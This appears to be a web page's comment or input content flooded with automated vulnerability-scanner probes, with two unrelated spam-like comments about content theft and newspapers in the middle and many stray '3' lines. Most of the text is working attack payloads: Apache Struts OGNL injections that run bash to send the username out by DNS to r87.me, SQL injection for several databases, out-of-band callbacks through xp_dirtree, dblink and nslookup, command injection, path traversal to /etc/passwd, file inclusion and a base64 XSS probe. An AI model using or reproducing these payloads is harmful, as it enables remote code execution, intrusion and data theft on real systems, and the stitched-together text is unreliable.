%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”7e4dabqs8tbftw2yqzgoh7g6g8nu4oaaksk2nej3″”jli.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
//r87.com/?0x1C4EA7
3
3
3
3
3
3
3
http://r87.com/n?.php
3
3
3
php://filter//resource=http://r87.com/n?.php
print(int)0xFFF9999-22;
‘ WAITFOR DELAY ‘0:0:25’–
NSFTW
ns:netsparker056650=vuln
‘{${print(int)0xFFF9999-22}}’
‘) WAITFOR DELAY ‘0:0:25’–
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)– 1
‘{${print(int)0xFFF9999-22}}’
‘)) WAITFOR DELAY ‘0:0:25’–
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
ns../../../../../../../../../../../boot.ini…………………………………………………………………………………………………………………………………………………………………
%{#context[“com.opensymphony.xwork2.dispatcher.HttpServletResponse”].addHeader(“a”,268409241-22)}
1)) WAITFOR DELAY ‘0:0:25’–
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
file:///etc/passwd
%{#context[“com.opensymphony.xwork2.dispatcher.HttpServletResponse”].addHeader(“a”,268409241-22)}
SELECT pg_sleep(25)–
n3tsp4rke2
“>
3
3
SELECT pg_sleep(25)–
3
\’;netsparker(0x059673);///
3
3
\’;netsparker(0x059674);///
3
',netsparker(0x059675),'
3
3
3
'+netsparker(0x05967C)+'
3
‘”@–>netsparker(0x0596B1)
3
exec(‘xp_dirtree ”\\rps2fkkh9w-cnlvp2halih1e-g34-l1qwohvsmfo’+’d38.r87.me’+’\c$\a”’)
-1′;exec(‘xp_dirtree ”\\rps2fkkh9wf9kupk68oxliwxpnnez5ikgchwszly’+’qiu.r87.me’+’\c$\a”’)–
syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\rps2fkkh9wr1gmn2vv6o_lrodvpazqmiikncg2pf’+’ck4.r87.me’+’\c$\a”’)–
dblink_connect(‘host=rps2fkkh9wb89iquoev_rccqwighpawpy630s5rc’||’6ng.r87.me user=a password=a connect_timeout=2’)
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(‘rps2fkkh9wdpc1bny2j_81dnkln7t-zuy1iawtu1’||’4qu.r87.me’) from DUAL))))
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(114)||chr(112)||chr(115)||chr(50)||chr(102)||chr(107)||chr(107)||chr(104)||chr(57)||chr(119)||chr(53)||chr(109)||chr(107)||chr(95)||chr(108)||chr(104)||chr(119)||chr(110)||chr(120)||chr(121)||chr(105)||chr(99)||chr(103)||chr(98)||chr(106)||chr(121)||chr(110)||chr(117)||chr(111)||chr(51)||chr(49)||chr(98)||chr(104)||chr(102)||chr(121)||chr(101)||chr(106)||chr(100)||chr(50)||chr(104)||chr(111)||chr(55)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
medievalmusic.ace.fordham.edu/trace.axd
13.92.237.218/trace.axd
13.92.237.218/trace.axd
gethostbyname(trim(‘rps2fkkh9wbalflmcyjhotus-sd4v70atal1lcoj’.’pms.r87.me’))
‘{${gethostbyname(trim(‘rps2fkkh9wddp6woxq4lflu8v1dflmpsjtyip42p’.’gz4.r87.me’))}}’
“+createobject(“WScript.Shell”).exec(“nslookup rps2fkkh9wsd-i4ny4vmcminaw56faqxb7rvqbyp” & “n7c.r87.me”).StdOut.ReadAll+”
127.0.0.1/elmah.axd
“& nslookup rps2fkkh9wqavyethtk_6kyhunwfpx70wqte3byz^jfm.r87.me&’\”`0&nslookup rps2fkkh9wqavyethtk_6kyhunwfpx70wqte3byz^jfm.r87.me&`’
127.0.0.1/elmah.axd
nslookup “rps2fkkh9wdjkcexfuzt8aeeszydqsvjzwsgit_1″”fzg.r87.me”
nslookup “rps2fkkh9w2h-jgqjeyybkkbowvoxvx_ar4zj6ty””2tu.r87.me”
&nslookup “rps2fkkh9wbc-pklssqjdarqmnekb1p7wb8buroy””lbe.r87.me”
&nslookup “rps2fkkh9wixs1cvjlspncupaep4czaljh0viv9y””c1i.r87.me”
‘&nslookup “rps2fkkh9wdsnxp2vvnv-dn3irnsdpjxql7mjtyb””t30.r87.me”
‘&nslookup “rps2fkkh9weh7-b9dl3y9jxqugmeptve7zvmibpw””myu.r87.me”
“&nslookup “rps2fkkh9wvxtfdkje9tw7gib8joxyepbxdtla2r””aa8.r87.me”
“&nslookup “rps2fkkh9wfmyyoi9iaqibztecyqybabjy5ohzst””4r4.r87.me”
|nslookup${IFS}”rps2fkkh9wegv9euejmhlal_0kqkz1q_9x2hfysr””yrs.r87.me”
|nslookup${IFS}”rps2fkkh9wasuamjup5f1rk3hznqre-g8uhpffqh””hj8.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”rps2fkkh9wxjfmeabsjhuii_plmn5mebhaevbcop””0t4.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
1 AND ‘NS=’ss
‘& ping -n 25 127.0.0.1 &
3
-1 OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
-1″OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255
-1’OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1–
-1″OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
-1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255–
1);SELECT pg_sleep(25)–
1″/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
-1 OR 1=1) AND ASC(MID((Now()),1,1))<255
1′ AND ASC(MID((Now()),1,1))>255
3
-1’OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1
-1’OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
-1’OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255–
1″ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255
-1″OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
1′ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
-1’OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255
1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0–
-1 OR 1=1)) AND ASC(MID((Now()),1,1))>25
1 AND ASC(MID((Now()),1,1))<255
3
3
exec(‘xp_dirtree ”\\lpjepdz3nefvryobetngv1_ihlqppux7tclmkvr2’+’dto.r87.me’+’\c$\a”’)
1′))exec(‘xp_dirtree ”\\lpjepdz3negvryrf1lpfxxoj3wqxnqfmpjwqbdfx’+’bn8.r87.me’+’\c$\a”’)–
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(‘lpjepdz3nevblbqmovuzm_vsw9z9eobbz7rdj_fu’||’niq.r87.me’) from DUAL))||’
3
3
3
3
3
gethostbyname(trim(‘lpjepdz3nejmevhvhnewry10bru3ou8dofc0-xzj’.’z7g.r87.me’))
+createobject(“WScript.Shell”).exec(“nslookup lpjepdz3ne4fie5isk92sme3m9kolow_ex2yg16k” & “ssi.r87.me”).StdOut.ReadAll+
“& nslookup lpjepdz3nebmddejq1bkjprtcxpyr9c9bhdnv1sf^m9i.r87.me&’\”`0&nslookup lpjepdz3nebmddejq1bkjprtcxpyr9c9bhdnv1sf^m9i.r87.me&`’
nslookup “lpjepdz3nebyneitxdoqibvqziz3jlo2b3wwo0vc””usk.r87.me”
nslookup “lpjepdz3ne3mf1we0dl2udsi7ium680ldcuohuly””eiu.r87.me”
&nslookup “lpjepdz3nexerlll8vewlockgrrglmno03rlak6n””gkq.r87.me”
&nslookup “lpjepdz3negnbzo1r9yzv2v6dc2yxd-jwgqbazen””rdi.r87.me”
‘&nslookup “lpjepdz3netnqxa0vtpxaczaozqt3kjyoxfpo9cc””2yk.r87.me”
‘&nslookup “lpjepdz3nefjbnp1vgsupsarbwnxwizaiug72_rs””sm0.r87.me”
“&nslookup “lpjepdz3newc1khhvk7gs-a5yhi5z_qdu7ylbvlu””fo8.r87.me”
“&nslookup “lpjepdz3neqz5klavrowppyrkrfyii4egre1dvtm””fpg.r87.me”
|nslookup${IFS}”lpjepdz3nef6cf9tinx43cvzy-_cqxgvvraneqm3″”u3e.r87.me”
|nslookup${IFS}”lpjepdz3nezlekj-cybu8r_dyjep-ulureu2rbdl””ony.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”lpjepdz3ne-1dlt48jgfogkbbqn2z4lfmbl9ear0″”mtu.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
1′ OR 1=1 OR ‘ns’=’ns
-1’OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>25
php://filter//resource=http://r87.com/n?.php
-1 OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1″OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0–
1″ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255–
-1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
-1’OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255–
1′ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255–
-1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25–
-1’OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255–
1’/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1–
-1 OR 1=1)) AND ASC(MID((Now()),1,1))>0
…//…//…//…//…//…//…//…//…//…//…//windows/win.ini
1′ AND ASC(MID((Now()),1,1))=1
-1’OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0
-1/**/OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)<255–
‘+netsparker(0x389B82)+’
-1″OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1’OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1–
1″ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255–
-1’OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255–
-1″OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1–
1′ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
-1″OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
-1’OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(103)||chr(114)||chr(110)||chr(108)||chr(114)||chr(105)||chr(56)||chr(118)||chr(111)||chr(104)||chr(54)||chr(121)||chr(56)||chr(105)||chr(106)||chr(102)||chr(116)||chr(48)||chr(109)||chr(113)||chr(107)||chr(122)||chr(120)||chr(109)||chr(48)||chr(101)||chr(51)||chr(107)||chr(106)||chr(108)||chr(109)||chr(97)||chr(122)||chr(109)||chr(122)||chr(106)||chr(115)||chr(102)||chr(109)||chr(98)||chr(53)||chr(118)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(103)||chr(114)||chr(110)||chr(108)||chr(114)||chr(105)||chr(56)||chr(118)||chr(111)||chr(104)||chr(45)||chr(109)||chr(97)||chr(112)||chr(110)||chr(118)||chr(99)||chr(100)||chr(50)||chr(105)||chr(117)||chr(102)||chr(109)||chr(51)||chr(101)||chr(100)||chr(113)||chr(103)||chr(107)||chr(52)||chr(121)||chr(97)||chr(110)||chr(115)||chr(108)||chr(114)||chr(117)||chr(112)||chr(49)||chr(112)||chr(99)||chr(95)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
1’/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
-1’OR 1=1)) AND ASC(MID((Now()),1,1))<255
-1 OR 1=1)) AND ASC(MID((Now()),1,1))>255
-1″OR 1=1) AND ASC(MID((Now()),1,1))<255
-1’OR 1=1 AND ASC(MID((Now()),1,1))>0
-1 OR 1=1 AND ASC(MID((Now()),1,1))>0
1′ AND ASC(MID((Now()),1,1))<255
1″ AND ASC(MID((Now()),1,1))>25
gethostbyname(trim(‘grnlri8vohwwbzpcy-felhaeo2qgvgkl2hibgtft’.’jls.r87.me’))
‘{${gethostbyname(trim(‘grnlri8vohcxcnwmdufqv31jufikr1yszahsik0w’.’d5c.r87.me’))}}’
“+createobject(“WScript.Shell”).exec(“nslookup grnlri8vohn9lvq8yuimbarske9cn236djz8oe-i” & “47i.r87.me”).StdOut.ReadAll+”
& nslookup grnlri8vohcubc1sdw3y4prk0vzpafoe6xgdnfd9^cog.r87.me&’\”`0&nslookup grnlri8vohcubc1sdw3y4prk0vzpafoe6xgdnfd9^cog.r87.me&`’
& nslookup grnlri8vohpk1b09qgd3fehtyd9oyn8nma20lsjj^hzq.r87.me&’\”`0&nslookup grnlri8vohpk1b09qgd3fehtyd9oyn8nma20lsjj^hzq.r87.me&`’
‘& nslookup grnlri8vohtqu_h4bzn4x2o7xlmqj5vh4iruj0nf^bvm.r87.me&’\”`0&nslookup grnlri8vohtqu_h4bzn4x2o7xlmqj5vh4iruj0nf^bvm.r87.me&`’
‘& nslookup grnlri8voh37-5qvght82xspha3ro-klsuouphjc^yve.r87.me&’\”`0&nslookup grnlri8voh37-5qvght82xspha3ro-klsuouphjc^yve.r87.me&`’
“& nslookup grnlri8voh9c0ptme8757i7yd1_glarhqwt8v-2q^bgy.r87.me&’\”`0&nslookup grnlri8voh9c0ptme8757i7yd1_glarhqwt8v-2q^bgy.r87.me&`’
“& nslookup grnlri8vohxbxzcsllma_08bou-q5-9mc0rmrcy2^8zu.r87.me&’\”`0&nslookup grnlri8vohxbxzcsllma_08bou-q5-9mc0rmrcy2^8zu.r87.me&`’
nslookup “grnlri8vohgda_zunhzm6phfuq18pva-l806teqp””pe0.r87.me”
nslookup “grnlri8vohpuzmeafbsnbha9zalnvb1z34h47uu3″”k0c.r87.me”
&nslookup “grnlri8vohueujwljp9cl-aark61cidyqh4ry_2-“”6xw.r87.me”
&nslookup “grnlri8vohjj-x8jdukfms9astih85t21x_az-6x””wck.r87.me”
‘&nslookup “grnlri8vohwfpylr2dpc25dow–olmn9av7m67-p””qg8.r87.me”
‘&nslookup “grnlri8voh2l2t0pdcmx7guub2gif88yyv_sycy1″”nfo.r87.me”
“&nslookup “grnlri8voh7ukdx5ag8ho-4sxeu7akcl4fmciewe””_3s.r87.me”
“&nslookup “grnlri8voh2rkfm3q5hsnpeibairnojzdrxrhhdt””gag.r87.me”
|nslookup${IFS}”grnlri8voh8zg6x5tokz3dcdvuxeciuypaa4grlk””utw.r87.me”
|nslookup${IFS}”grnlri8voh-t6ang_atxlsyy16l_9rrff0bechbz””wpo.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”grnlri8vohzzktvn3p5jsqrskhogwbj5p1bwgub-“”v8i.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
With havin so much written content do you ever run into any
issues of plagorism or copyright violation? My blog has a lot of exclusive
content I’ve either written myself or outsourced but it appears a lot of it is popping it up
all over the web without my authorization. Do you know any
solutions to help reduce content from being stolen? I’d certainly appreciate it.
Why users still make use of to read news papers when in this technological globe everything is
accessible on web?
3
3
3
3
3
3
SET /A 0xFFF9999-2 &
3
3
3
3
((SELECT 1 FROM (SELECT SLEEP(25))A))
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5MEM5KTwvc2NyaXB0Pg==
3
-1/**/OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>255
1″/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>25
-1’OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0–
1″ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
1″ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
-1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255–
1’/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255
-1″OR 1=1) AND ASC(MID((Now()),1,1))>255
1′ AND ASC(MID((Now()),1,1))>25
-1/**/OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0–
-1″OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1–
-1″OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25–
-1″OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1″OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
-1″OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
1″ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0–
-1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255
-1’OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255–
1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255–
-1’OR 1=1)) AND ASC(MID((Now()),1,1))>255
-1’OR 1=1) AND ASC(MID((Now()),1,1))>25
-1 OR 1=1 AND ASC(MID((Now()),1,1))<255
gethostbyname(trim(‘lmh0gw9hrsqb0tk_s9jiqxeowuqtmq1_pxra8_j-‘.’_ly.r87.me’))
‘{${gethostbyname(trim(‘lmh0gw9hrsrojlsyj-q2agag7dw0tmbcvlpmxlrj’.’aac.r87.me’))}}’
‘+gethostbyname(lc ‘lmh0gw9hrsythjubsbsvt1vbuwbhvwachwqwrivp’.’gti.r87.me’)+’
“+gethostbyname(lc ‘lmh0gw9hrssfttmeaxbb3kxed-b6owwhkvr9cjmz’.’imq.r87.me’)+”
nslookup lmh0gw9hrs2y2hutwkrt2dol_hebvk48pzmu2sla^-8q.r87.me&’\”`0&nslookup lmh0gw9hrs2y2hutwkrt2dol_hebvk48pzmu2sla^-8q.r87.me&`’
nslookup lmh0gw9hrswzjwvnttkpcsn0o1vvmnziadw3qxfo^8w0.r87.me&’\”`0&nslookup lmh0gw9hrswzjwvnttkpcsn0o1vvmnziadw3qxfo^8w0.r87.me&`’
& nslookup lmh0gw9hrsobnpqlqoy89co55elcgr2avugz3qa_^qyq.r87.me&’\”`0&nslookup lmh0gw9hrsobnpqlqoy89co55elcgr2avugz3qa_^qyq.r87.me&`’
& nslookup lmh0gw9hrsvro5txlqjcp3rovgtoyv2rppagqreq^_pk.r87.me&’\”`0&nslookup lmh0gw9hrsvro5txlqjcp3rovgtoyv2rppagqreq^_pk.r87.me&`’
‘& nslookup lmh0gw9hrs1d05e8bn94pkxvs4tf5zsu_xepltpp^0f4.r87.me&’\”`0&nslookup lmh0gw9hrs1d05e8bn94pkxvs4tf5zsu_xepltpp^0f4.r87.me&`’
‘& nslookup lmh0gw9hrs3hsik50g1s71lfrjydeam6xbtulxgf^ve8.r87.me&’\”`0&nslookup lmh0gw9hrs3hsik50g1s71lfrjydeam6xbtulxgf^ve8.r87.me&`’
“& nslookup lmh0gw9hrsjakyyfwdbm8-_22u7mxs4fhjnlktdm^_rq.r87.me&’\”`0&nslookup lmh0gw9hrsjakyyfwdbm8-_22u7mxs4fhjnlktdm^_rq.r87.me&`’
“& nslookup lmh0gw9hrszaavgmzda1r1ap5g57hg1xbordhzmm^tfo.r87.me&’\”`0&nslookup lmh0gw9hrszaavgmzda1r1ap5g57hg1xbordhzmm^tfo.r87.me&`’
nslookup “lmh0gw9hrs316daxsaxkac8gf9dsal0aut3oz3p0″”42i.r87.me”
nslookup “lmh0gw9hrszf1ycqjenkn5kk1tezgwzb6nsnnpba””5hw.r87.me”
&nslookup “lmh0gw9hrsa4rex6-smcvdune8q4mfrziinixslb””kl8.r87.me”
&nslookup “lmh0gw9hrshioh_0tqc43vkd3isiledwsjkkpt9u””zo0.r87.me”
‘&nslookup “lmh0gw9hrs2jgaplateyhhakqhoba4e9hktrg7h4″”imm.r87.me”
‘&nslookup “lmh0gw9hrstrsfbputefagkiwwtwdbzkrjephwec””nrs.r87.me”
“&nslookup “lmh0gw9hrshghmg4elro20zlbexw3uihmgwosh2-“”tik.r87.me”
“&nslookup “lmh0gw9hrsq_8ngjn1vm3wefjpb-9wsihpkur4k-“”upo.r87.me”
|nslookup${IFS}”lmh0gw9hrs5xce8cfsx5gd9lpj6kyly_cnkpiz09″”kte.r87.me”
|nslookup${IFS}”lmh0gw9hrsaliea7e4nqm3qwakkocjzc70_2z9kb””kge.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”lmh0gw9hrsepeevmed96rqyiarwh77pjq0zzuvr8″”vgo.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
3
3
3
3
3
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
3
1;SELECT pg_sleep(25)–
3
3
3
3
3
3
3
3
/../../../../../../../../../../../etc/passwd
3
3
3
3
3
3
3
3
3
3
3
3
3
exec(‘xp_dirtree ”\\izimdayqtl_7evtr6xb0qzooqre_qbl4dlhag8l1’+’kaa.r87.me’+’\c$\a”’)
syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\izimdayqtlc-tcex3vpu3cbwkgu1oeydapdthtwn’+’ggu.r87.me’+’\c$\a”’)–
‘||(SELECT dblink_connect(‘host=izimdayqtltn3w4ojo_7dxm_ab-exrgwrvmpi-yl’||’hig.r87.me user=a password=a connect_timeout=2′))||’
-1’OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>255–
-1″OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0–
1″/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0–
-1’OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25–
-1″OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
1′ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
-1’OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
-1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0–
-1’OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
-1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0–
-1’OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
-1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
1′ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1–
-1’OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1–
-1’OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25–
